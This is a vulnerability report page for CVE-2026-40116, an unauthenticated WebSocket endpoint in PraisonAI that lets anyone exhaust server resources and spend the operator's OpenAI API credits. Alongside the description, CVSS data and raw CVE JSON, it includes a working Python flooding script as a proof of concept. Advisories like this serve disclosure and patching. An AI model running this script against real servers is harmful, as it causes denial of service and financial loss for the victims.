Security Vulnerability Report
中文
CVE-2026-40116 CVSS 7.5 HIGH

CVE-2026-40116

Published: 2026-04-09 22:16:35
Last Modified: 2026-04-17 18:33:22
Source: [email protected]

Description

PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits. This vulnerability is fixed in 4.5.128.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 4.5.128

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio import websockets async def exploit(target_url): # Target the vulnerable WebSocket endpoint uri = f"{target_url}/media-stream" print(f"[+] Connecting to {uri}...") try: # Establish connection without authentication async with websockets.connect(uri) as websocket: print("[+] Connection established. Starting flood...") # Create a large payload to consume bandwidth and memory payload = "A" * 1024 * 1024 # 1MB payload while True: # Send data continuously to drain resources and API credits await websocket.send(payload) print("[+] Packet sent: Resource draining...") await asyncio.sleep(0.1) except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL (e.g., http://localhost:8000) target = "ws://127.0.0.1:8000" asyncio.run(exploit(target))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40116", "sourceIdentifier": "[email protected]", "published": "2026-04-09T22:16:35.297", "lastModified": "2026-04-17T18:33:22.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PraisonAI is a multi-agent teams system. Prior to 4.5.128, the /media-stream WebSocket endpoint in PraisonAI's call module accepts connections from any client without authentication or Twilio signature validation. Each connection opens an authenticated session to OpenAI's Realtime API using the server's API key. There are no limits on concurrent connections, message rate, or message size, allowing an unauthenticated attacker to exhaust server resources and drain the victim's OpenAI API credits. This vulnerability is fixed in 4.5.128."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.128", "matchCriteriaId": "56CDE5F5-B03C-4C3A-9A92-F61C9DFDA9B1"}]}]}], "references": [{"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-q5r4-47m9-5mc7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.